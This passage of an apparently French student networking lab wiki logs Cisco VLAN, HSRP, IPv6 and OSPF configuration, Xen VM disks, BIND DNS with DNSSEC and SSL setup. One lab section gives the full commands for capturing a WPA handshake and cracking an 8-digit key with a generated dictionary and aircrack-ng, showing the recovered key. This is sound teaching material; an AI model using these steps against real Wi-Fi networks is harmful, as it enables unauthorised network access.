 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.pw &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
